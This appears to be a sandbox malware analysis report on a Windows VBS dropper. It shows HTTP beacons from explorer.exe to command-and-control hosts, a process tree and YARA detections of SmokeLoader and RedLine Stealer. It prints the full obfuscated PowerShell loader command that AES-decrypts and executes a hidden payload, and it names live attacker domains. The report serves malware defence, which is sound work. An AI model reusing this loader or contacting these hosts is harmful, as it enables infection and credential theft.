                                                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                                                                                Content-Length: 214
                                                                                                Host: connecticutproperty.ru
                                                                                                Dec 18, 2024 09:25:10.362355947 CET214OUTData Raw: a1 5f 79 54 85 4b 2b b1 ba 3c d5 ca fc b2 53 46 21 42 b4 5b 65 ce 42 52 ae 56 c8 1f 01 8c 77 51 cf 54 da fd 4c a7 06 4b 5f bc cd 04 b6 4d 18 2e a5 0e 78 5d cf 32 6d 2d d9 82 ec 5e cd da f3 84 e5 8c 8d e0 18 1d ce ca bf 4a 72 43 29 be 8e 42 54 da
                                                                                                Data Ascii: _yTK+<SF!B[eBRVwQTLK_M.x]2m-^JrC)BT@ZK)(V~NX=o-9DmmeCWLCoB_AhDb6FbN4iS.&dGl
                                                                                                Dec 18, 2024 09:25:11.708875895 CET300INHTTP/1.1 405 Not Allowed
                                                                                                Server: nginx
                                                                                                Date: Wed, 18 Dec 2024 08:25:11 GMT
                                                                                                Content-Type: text/html
                                                                                                Content-Length: 150
                                                                                                Connection: keep-alive
                                                                                                Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 35 20 4e 6f 74 20 41 6c 6c 6f 77 65 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 35 20 4e 6f 74 20 41 6c 6c 6f 77 65 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                                Data Ascii: <html><head><title>405 Not Allowed</title></head><body><center><h1>405 Not Allowed</h1></center><hr><center>nginx</center></body></html>


                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                10192.168.2.54996194.156.177.51801028C:\Windows\explorer.exe
                                                                                                TimestampBytes transferredDirectionData
                                                                                                Dec 18, 2024 09:25:12.862088919 CET284OUTPOST / HTTP/1.1
                                                                                                Connection: Keep-Alive
                                                                                                Content-Type: application/x-www-form-urlencoded
                                                                                                Accept: */*
                                                                                                Referer: http://fouawsejyefgcj.org/
                                                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                                                                                Content-Length: 181
                                                                                                Host: constractionscity1991.lat
                                                                                                Dec 18, 2024 09:25:12.862106085 CET181OUTData Raw: a1 5f 79 54 85 4b 2b b1 ba 3c d5 ca fc b2 53 46 21 42 b4 5b 65 ce 42 52 ae 56 c8 1f 01 8c 77 51 cf 54 da fd 4c a7 06 4b 5f bc cd 04 b6 4d 18 2e a5 0e 78 5d cf 32 6d 2d d9 82 ec 5e cd da f3 84 e5 8c 8d e0 18 1d ce ca bf 4a 72 43 29 be a8 14 2e c4
                                                                                                Data Ascii: _yTK+<SF!B[eBRVwQTLK_M.x]2m-^JrC).iL8Iks7/nYGP)E~<!<'fmLUg6^a^Pd?wg5t$;}
                                                                                                Dec 18, 2024 09:25:14.249541044 CET595INHTTP/1.1 404 Not Found
                                                                                                Server: nginx
                                                                                                Date: Wed, 18 Dec 2024 08:25:14 GMT
                                                                                                Content-Type: text/html; charset=utf-8
                                                                                                Transfer-Encoding: chunked
                                                                                                Connection: keep-alive
                                                                                                Data Raw: 31 39 64 0d 0a 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 61 64 64 72 65 73 73 3e 41 70 61 63 68 65 2f 32 2e 34 2e [TRUNCATED]
                                                                                                Data Ascii: 19d<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL / was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr><address>Apache/2.4.62 (Debian) Server at constractionscity1991.lat Port 80</address></body></html>0


                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                11192.168.2.54996394.156.177.51801028C:\Windows\explorer.exe
                                                                                                TimestampBytes transferredDirectionData
                                                                                                Dec 18, 2024 09:25:14.385567904 CET287OUTPOST / HTTP/1.1
                                                                                                Connection: Keep-Alive
                                                                                                Content-Type: application/x-www-form-urlencoded
                                                                                                Accept: */*
                                                                                                Referer: http://jyqxqlsrlwqxtdg.org/
                                                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                                                                                Content-Length: 188
                                                                                                Host: restructurisationservice.ru
                                                                                                Dec 18, 2024 09:25:14.385591030 CET188OUTData Raw: a1 5f 79 54 85 4b 2b b1 ba 3c d5 ca fc b2 53 46 21 42 b4 5b 65 ce 42 52 ae 56 c8 1f 01 8c 77 51 cf 54 da fd 4c a7 06 4b 5f bc cd 04 b6 4d 18 2e a5 0e 78 5d cf 32 6d 2d d9 82 ec 5e cd da f3 84 e5 8c 8d e0 18 1d ce ca bf 4a 72 43 29 be bf 28 3c df
                                                                                                Data Ascii: _yTK+<SF!B[eBRVwQTLK_M.x]2m-^JrC)(<6m5Uw""97AhOj)>!(.!zKU`APrCS{H]KH(|j{
                                                                                                Dec 18, 2024 09:25:15.742557049 CET597INHTTP/1.1 404 Not Found
                                                                                                Server: nginx
                                                                                                Date: Wed, 18 Dec 2024 08:25:15 GMT
                                                                                                Content-Type: text/html; charset=utf-8
                                                                                                Transfer-Encoding: chunked
                                                                                                Connection: keep-alive
                                                                                                Data Raw: 31 39 66 0d 0a 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 61 64 64 72 65 73 73 3e 41 70 61 63 68 65 2f 32 2e 34 2e [TRUNCATED]
                                                                                                Data Ascii: 19f<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL / was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr><address>Apache/2.4.62 (Debian) Server at restructurisationservice.ru Port 80</address></body></html>0


                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                12192.168.2.549968109.70.26.37801028C:\Windows\explorer.exe
                                                                                                TimestampBytes transferredDirectionData
                                                                                                Dec 18, 2024 09:25:15.868762016 CET281OUTPOST / HTTP/1.1
                                                                                                Connection: Keep-Alive
                                                                                                Content-Type: application/x-www-form-urlencoded
                                                                                                Accept: */*
                                                                                                Referer: http://ifwdryoytskvgy.com/
                                                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                                                                                Content-Length: 316
                                                                                                Host: connecticutproperty.ru
                                                                                                Dec 18, 2024 09:25:15.868794918 CET316OUTData Raw: a1 5f 79 54 85 4b 2b b1 ba 3c d5 ca fc b2 53 46 21 42 b4 5b 65 ce 42 52 ae 56 c8 1f 01 8c 77 51 cf 54 da fd 4c a7 06 4b 5f bc cd 04 b6 4d 18 2e a5 0e 78 5d cf 32 6d 2d d9 82 ec 5e cd da f3 84 e5 8c 8d e0 18 1d ce ca bf 4a 72 43 29 be ae 34 73 c3
                                                                                                Data Ascii: _yTK+<SF!B[eBRVwQTLK_M.x]2m-^JrC)4sGs[<Y[rg@_8wYs?YVV0wi<YZjq LG4Iy/d6`Z1f?>%y@;N|lZ||A{o0"jg&Pc*2v%(5VC


                                                                                                Click to jump to process

                                                                                                Click to jump to process

                                                                                                Click to dive into process behavior distribution

                                                                                                Click to jump to process

                                                                                                Target ID:0
                                                                                                Start time:03:23:12
                                                                                                Start date:18/12/2024
                                                                                                Path:C:\Windows\System32\wscript.exe
                                                                                                Wow64 process (32bit):false
                                                                                                Commandline:C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\#U0421#U043a#U0430#U043d-#U043a#U043e#U043fi#U044f #U041f#U0430#U0441#U043f#U043e#U0440#U0442.vbs"
                                                                                                Imagebase:0x7ff694780000
                                                                                                File size:170'496 bytes
                                                                                                MD5 hash:A47CBE969EA935BDD3AB568BB126BC80
                                                                                                Has elevated privileges:false
                                                                                                Has administrator privileges:false
                                                                                                Programmed in:C, C++ or other language
                                                                                                Reputation:high
                                                                                                Has exited:true

                                                                                                Target ID:2
                                                                                                Start time:03:23:12
                                                                                                Start date:18/12/2024
                                                                                                Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                Wow64 process (32bit):false
                                                                                                Commandline:"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -w 1 -ep Unrestricted -nop function wfMpF($MmiD){return -split ($MmiD -replace '..', '0x$& ')};$Ralma = wfMpF('6DDD913A204EDA9B48CF5583720FA53B3C5CDEE6E974B7BF173341D66880A83528E76A5A809EDA47D2C263E95E00A51AE2A33D069542CCAE0C0FEF761523C7AFE37B64185C653B4C4BF39E67E1D89CD6636984FC646C493C76294187D1B2B75D79DBAAB680164B0C94848AA09BF281C313B7C3C2532160823EFECF40AF7A9240375A29DD3D82C002B29486566C166F6F04711F20F7F5B2B6CDC61AA7908A19FE7DE86886141F7A340433F1A7D86ED97FA28C2AC93960B814156D48D922F4B029C07206C1AEF6B44FF7AF133921B3DB8F2FF073F4CFFA862EDB9214CE28C296D8FB5162D5AB69B39935125AB3242B742A33D4141147FCF532EEB49A69FEA321ACE3E5BFFDC1520FB98A143BBAFD22BB525550D37D463F288C61A14B1258687EB239E9A260D0E160D9614F09967FE97F9B2CE6BE1C24011E78CAAB16CEEA4345678EAB2756D340EA7C849F355578CB519AA0DE8625F493EADBD13583073BE0D247EBD15CD925FE851855979D18651080CF3BD6FB803715B373C134F7D1EA1E3FAB7E02D0D4AD6FC40EAD36C911A1AE73D421AC10EFE01473747C3B4FC05FD6D4D08C3521DB6BA6E9EEF6CB8B1C7FC76884C910C22860E3575831C23A88693A6D7FE1F158E001ED75B4588C08ED639A5B3F223E76CF1C17495201F16D4149F714CA4BD42D2D5E17399CF5E4FCAE83C94E9DBA2089F3C430CE2585999674221CE62E61DCB128072E936B5DFED4CEBEEBA9232E582C33488E026E0F5123211B5E9B12B46C0CA95D1F9A903B6B2310CB4E108C5C9B8328E9021E1B76EAE56EF681BBC20E3C74BCCAA8E25DECF9C13896D1252B4B86B2315F62ECC43FDD7F9D446C70E046C7872722C69950AC7A26563C81C0A52F3B0F0D43D41FE0060D34820472AE9A9818D2FD3B117A4B0084EAA21D1666A9297DCAEACADD63462FBB1E22C56869537CA0C0E1CD52EABFF12858BC9B1DDDC8CB4C70E9FA2549B5144F447D1DEFC94F5830D9CAC04660B19C385EC1A3D989AC7BAD8C3E7E908C697C4DA249D156475901B73F3C800C602E586AA6998C17EB947E3D2E8A13E7292546210AF7EB29B003DA7407AF81F5B7811619B414E06D1D724EF79FE960509F6D85F4B55A5B6A365F6EE49825F0B19433EA2C64737468F1FAA1DDA90E230F23CB6751052459789FAC25AB27097516E251B4C56D5B1497389F33F64F9C729FADB9F635E6771D884FFAD2363C3D29D49812042636E0B8AAEE30');$idRJO=-join [char[]](([Security.Cryptography.Aes]::Create()).CreateDecryptor((wfMpF('4F6C6D774C5361495051654D7258624F')),[byte[]]::new(16)).TransformFinalBlock($Ralma,0,$Ralma.Length)); & $idRJO.Substring(0,3) $idRJO.Substring(3)
                                                                                                Imagebase:0x7ff7be880000
                                                                                                File size:452'608 bytes
                                                                                                MD5 hash:04029E121A0CFA5991749937DD22A1D9
                                                                                                Has elevated privileges:false
                                                                                                Has administrator privileges:false
                                                                                                Programmed in:C, C++ or other language
                                                                                                Reputation:high
                                                                                                Has exited:true

                                                                                                Target ID:3
                                                                                                Start time:03:23:12
                                                                                                Start date:18/12/2024
                                                                                                Path:C:\Windows\System32\conhost.exe
                                                                                                Wow64 process (32bit):false
                                                                                                Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                Imagebase:0x7ff6d64d0000
                                                                                                File size:862'208 bytes
                                                                                                MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                Has elevated privileges:false
                                                                                                Has administrator privileges:false
                                                                                                Programmed in:C, C++ or other language
                                                                                                Reputation:high
                                                                                                Has exited:true

                                                                                                Target ID:4
                                                                                                Start time:03:23:20
                                                                                                Start date:18/12/2024
                                                                                                Path:C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
                                                                                                Wow64 process (32bit):false
                                                                                                Commandline:"C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe" "C:\Users\user\AppData\Roaming\invoce2.pdf"
                                                                                                Imagebase:0x7ff686a00000
                                                                                                File size:5'641'176 bytes
                                                                                                MD5 hash:24EAD1C46A47022347DC0F05F6EFBB8C
                                                                                                Has elevated privileges:false
                                                                                                Has administrator privileges:false
                                                                                                Programmed in:C, C++ or other language
                                                                                                Reputation:high
                                                                                                Has exited:false

                                                                                                Target ID:5
                                                                                                Start time:03:23:21
                                                                                                Start date:18/12/2024
                                                                                                Path:C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe
                                                                                                Wow64 process (32bit):false
                                                                                                Commandline:"C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe" --backgroundcolor=16777215
                                                                                                Imagebase:0x7ff6413e0000
                                                                                                File size:3'581'912 bytes
                                                                                                MD5 hash:9B38E8E8B6DD9622D24B53E095C5D9BE
                                                                                                Has elevated privileges:false
                                                                                                Has administrator privileges:false
                                                                                                Programmed in:C, C++ or other language
                                                                                                Reputation:high
                                                                                                Has exited:false

                                                                                                Target ID:6
                                                                                                Start time:03:23:21
                                                                                                Start date:18/12/2024
                                                                                                Path:C:\Users\user\AppData\Roaming\putty.exe
                                                                                                Wow64 process (32bit):true
                                                                                                Commandline:"C:\Users\user\AppData\Roaming\putty.exe"
                                                                                                Imagebase:0x7ff6d64d0000
                                                                                                File size:331'264 bytes
                                                                                                MD5 hash:C09AA26230A2083DA9032866FD33703D
                                                                                                Has elevated privileges:false
                                                                                                Has administrator privileges:false
                                                                                                Programmed in:C, C++ or other language
                                                                                                Yara matches:
                                                                                                • Rule: JoeSecurity_SmokeLoader_2, Description: Yara detected SmokeLoader, Source: 00000006.00000002.2239564314.00000000021D0000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security
                                                                                                • Rule: Windows_Trojan_Smokeloader_4e31426e, Description: unknown, Source: 00000006.00000002.2239564314.00000000021D0000.00000004.00001000.00020000.00000000.sdmp, Author: unknown
                                                                                                • Rule: JoeSecurity_SmokeLoader_2, Description: Yara detected SmokeLoader, Source: 00000006.00000002.2239633273.0000000002211000.00000004.10000000.00040000.00000000.sdmp, Author: Joe Security
                                                                                                • Rule: Windows_Trojan_Smokeloader_4e31426e, Description: unknown, Source: 00000006.00000002.2239633273.0000000002211000.00000004.10000000.00040000.00000000.sdmp, Author: unknown
                                                                                                • Rule: Windows_Trojan_RedLineStealer_ed346e4c, Description: unknown, Source: 00000006.00000002.2239261367.0000000000550000.00000040.00001000.00020000.00000000.sdmp, Author: unknown
                                                                                                • Rule: JoeSecurity_SmokeLoader_2, Description: Yara detected SmokeLoader, Source: 00000006.00000003.2152981082.0000000001F90000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security
                                                                                                • Rule: Windows_Trojan_Smokeloader_3687686f, Description: unknown, Source: 00000006.00000002.2239346704.00000000006D0000.00000040.00001000.00020000.00000000.sdmp, Author: unknown
                                                                                                Antivirus matches:
                                                                                                • Detection: 100%, Avira
                                                                                                • Detection: 100%, Joe Sandbox ML
                                                                                                Reputation:low
                                                                                                Has exited:true

                                                                                                Target ID:7
                                                                                                Start time:03:23:21
                                                                                                Start date:18/12/2024
                                                                                                Path:C:\Windows\System32\svchost.exe
                                                                                                Wow64 process (32bit):false
                                                                                                Commandline:C:\Windows\System32\svchost.exe -k netsvcs -p -s BITS
                                                                                                Imagebase:0x7ff7e52b0000
                                                                                                File size:55'320 bytes
                                                                                                MD5 hash:B7F884C1B74A263F746EE12A5F7C9F6A
                                                                                                Has elevated privileges:true
                                                                                                Has administrator privileges:true
                                                                                                Programmed in:C, C++ or other language
                                                                                                Reputation:high
                                                                                                Has exited:false

                                                                                                Target ID:8
                                                                                                Start time:03:23:22
                                                                                                Start date:18/12/2024
                                                                                                Path:C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe
                                                                                                Wow64 process (32bit):false
                                                                                                Commandline:"C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --log-severity=disable --user-agent-product="ReaderServices/23.6.20320 Chrome/105.0.0.0" --lang=en-US --user-data-dir="C:\Users\user\AppData\Local\CEF\User Data" --log-file="C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\debug.log" --mojo-platform-channel-handle=2068 --field-trial-handle=1768,i,4178814619704218738,12566642219925520578,131072 --disable-features=BackForwardCache,CalculateNativeWinOcclusion,WinUseBrowserSpellChecker /prefetch:8
                                                                                                Imagebase:0x7ff6413e0000
                                                                                                File size:3'581'912 bytes
                                                                                                MD5 hash:9B38E8E8B6DD9622D24B53E095C5D9BE
                                                                                                Has elevated privileges:false
                                                                                                Has administrator privileges:false
                                                                                                Programmed in:C, C++ or other language
                                                                                                Reputation:high
                                                                                                Has exited:false

                                                                                                Target ID:12
                                                                                                Start time:03:23:29
                                                                                                Start date:18/12/2024
                                                                                                Path:C:\Windows\explorer.exe
                                                                                                Wow64 process (32bit):false
                                                                                                Commandline:C:\Windows\Explorer.EXE
                                                                                                Imagebase:0x7ff674740000
                                                                                                File size:5'141'208 bytes
                                                                                                MD5 hash:662F4F92FDE3557E86D110526BB578D5
                                                                                                Has elevated privileges:false
                                                                                                Has administrator privileges:false
                                                                                                Programmed in:C, C++ or other language
                                                                                                Reputation:high
                                                                                                Has exited:false

                                                                                                Target ID:13
                                                                                                Start time:03:23:50
                                                                                                Start date:18/12/2024
                                                                                                Path:C:\Users\user\AppData\Roaming\ddhfdfu
                                                                                                Wow64 process (32bit):true
                                                                                                Commandline:C:\Users\user\AppData\Roaming\ddhfdfu
                                                                                                Imagebase:0x400000
                                                                                                File size:331'264 bytes
                                                                                                MD5 hash:C09AA26230A2083DA9032866FD33703D
                                                                                                Has elevated privileges:false
                                                                                                Has administrator privileges:false
                                                                                                Programmed in:C, C++ or other language
                                                                                                Yara matches:
                                                                                                • Rule: JoeSecurity_SmokeLoader_2, Description: Yara detected SmokeLoader, Source: 0000000D.00000002.2474381607.0000000000751000.00000004.10000000.00040000.00000000.sdmp, Author: Joe Security
                                                                                                • Rule: Windows_Trojan_Smokeloader_4e31426e, Description: unknown, Source: 0000000D.00000002.2474381607.0000000000751000.00000004.10000000.00040000.00000000.sdmp, Author: unknown
                                                                                                • Rule: Windows_Trojan_Smokeloader_3687686f, Description: unknown, Source: 0000000D.00000002.2474059930.0000000000610000.00000040.00001000.00020000.00000000.sdmp, Author: unknown
                                                                                                • Rule: Windows_Trojan_RedLineStealer_ed346e4c, Description: unknown, Source: 0000000D.00000002.2473769295.0000000000540000.00000040.00001000.00020000.00000000.sdmp, Author: unknown
                                                                                                • Rule: JoeSecurity_SmokeLoader_2, Description: Yara detected SmokeLoader, Source: 0000000D.00000003.2421108452.0000000000620000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security
                                                                                                • Rule: JoeSecurity_SmokeLoader_2, Description: Yara detected SmokeLoader, Source: 0000000D.00000002.2474086059.0000000000620000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security
                                                                                                • Rule: Windows_Trojan_Smokeloader_4e31426e, Description: unknown, Source: 0000000D.00000002.2474086059.0000000000620000.00000004.00001000.00020000.00000000.sdmp, Author: unknown
                                                                                                Antivirus matches:
                                                                                                • Detection: 100%, Avira
                                                                                                • Detection: 100%, Joe Sandbox ML
                                                                                                Has exited:true

                                                                                                Reset < >
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000002.00000002.2212714482.00007FF848FE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848FE0000, based on PE: false
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_2_2_7ff848fe0000_powershell.jbxd
                                                                                                  Similarity
                                                                                                  • API ID:
                                                                                                  • String ID:
                                                                                                  • API String ID:
                                                                                                  • Opcode ID: 6f71a76da59558f487d0a95fbd931ccf2a41ae2e2df6eaa1b54ad6fa3f79e6af
                                                                                                  • Instruction ID: c31a51dacb5c65fa79824c15c6cd039d60ca752cf75d057a21ad56ffbc1e539f
                                                                                                  • Opcode Fuzzy Hash: 6f71a76da59558f487d0a95fbd931ccf2a41ae2e2df6eaa1b54ad6fa3f79e6af
                                                                                                  • Instruction Fuzzy Hash: 8F61E932E1EE8A4FF7A9AB2C1469275A6E1EF55690F4901BEC44DC31D2EF1CEC044359
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000002.00000002.2212714482.00007FF848FE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848FE0000, based on PE: false
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_2_2_7ff848fe0000_powershell.jbxd
                                                                                                  Similarity
                                                                                                  • API ID:
                                                                                                  • String ID:
                                                                                                  • API String ID:
                                                                                                  • Opcode ID: 2a5d536289c17f3d4da3d54d4666d57d6c7dd44934dcec4b689b4aab819cc2ba
                                                                                                  • Instruction ID: 66a6201661fc61cf0fd8796a5fab4cf3ec370ae567d9fe6be41732f528179a88
                                                                                                  • Opcode Fuzzy Hash: 2a5d536289c17f3d4da3d54d4666d57d6c7dd44934dcec4b689b4aab819cc2ba
                                                                                                  • Instruction Fuzzy Hash: 0A41F572E1FE8B4FF3AAB72C1469275A6D2EF85291F5901BAC44DC31D2DF1DAC04424A
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000002.00000002.2212714482.00007FF848FE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848FE0000, based on PE: false
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_2_2_7ff848fe0000_powershell.jbxd
                                                                                                  Similarity
                                                                                                  • API ID:
                                                                                                  • String ID:
                                                                                                  • API String ID:
                                                                                                  • Opcode ID: cc61d71dd767ebf29222df9c3cadd14f05eccdc02a5b0ecc9f7c861c5ccaca70
                                                                                                  • Instruction ID: 98eb1ae0b6344e26f75463e1af57cdf0c498678521199983a5ed22000db3d030
                                                                                                  • Opcode Fuzzy Hash: cc61d71dd767ebf29222df9c3cadd14f05eccdc02a5b0ecc9f7c861c5ccaca70
                                                                                                  • Instruction Fuzzy Hash: F7012132E1DD094FE3A5B718A4065B9A3D1EF94260F4801FAD22DC31C7EF0D6C01868A
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000002.00000002.2212166246.00007FF848F10000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F10000, based on PE: false
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_2_2_7ff848f10000_powershell.jbxd
                                                                                                  Similarity
                                                                                                  • API ID:
                                                                                                  • String ID:
                                                                                                  • API String ID:
                                                                                                  • Opcode ID: 67d1617613e612b7a049b31fcb3c0c06bb00aa9b6616606570c7eb9b15762ca9
                                                                                                  • Instruction ID: 2b932cbe6fcaa028ac5d8016f72b29c6d26ba38c0b1e7422f17bb1da5354fd6f
                                                                                                  • Opcode Fuzzy Hash: 67d1617613e612b7a049b31fcb3c0c06bb00aa9b6616606570c7eb9b15762ca9
                                                                                                  • Instruction Fuzzy Hash: 6E01677111CB0C4FDB44EF0CE451AA5B7E0FB95364F10056EE58AC3695DB36E881CB45
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000002.00000002.2212714482.00007FF848FE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848FE0000, based on PE: false
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_2_2_7ff848fe0000_powershell.jbxd
                                                                                                  Similarity
                                                                                                  • API ID:
                                                                                                  • String ID:
                                                                                                  • API String ID:
                                                                                                  • Opcode ID: fb03888473209101ffc2049d95208c2b4a6cc764b65a7e831359655368949a0d
                                                                                                  • Instruction ID: fe68051a291bbcdd2426c9b4aeb2362b485fd2a560757723a307c1d1cfd6d6bb
                                                                                                  • Opcode Fuzzy Hash: fb03888473209101ffc2049d95208c2b4a6cc764b65a7e831359655368949a0d
                                                                                                  • Instruction Fuzzy Hash: 5FE09A32E0E92E1FEBA1B6A828191B8A691FF942A1B0801B6D91CD35C1DA0898104399
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000002.00000002.2212714482.00007FF848FE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848FE0000, based on PE: false
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_2_2_7ff848fe0000_powershell.jbxd
                                                                                                  Similarity
                                                                                                  • API ID:
                                                                                                  • String ID:
                                                                                                  • API String ID:
                                                                                                  • Opcode ID: ddb8b4045643f2b999713ee9420757906409272aa1aff10b6d719d88c3701798
                                                                                                  • Instruction ID: fcd29089bde3a3d632e0451a2ca3757d6ac31e9d5fcbed726a58e30e9726e68b
                                                                                                  • Opcode Fuzzy Hash: ddb8b4045643f2b999713ee9420757906409272aa1aff10b6d719d88c3701798
                                                                                                  • Instruction Fuzzy Hash: 97021331E0DA8A4FE796EB2888546B47BE2EF5A361F0801FAD04DC71D3DA2D9885C355

                                                                                                  Execution Graph

                                                                                                  Execution Coverage:4.3%
                                                                                                  Dynamic/Decrypted Code Coverage:96.9%
                                                                                                  Signature Coverage:58.5%
                                                                                                  Total number of Nodes:65
                                                                                                  Total number of Limit Nodes:3
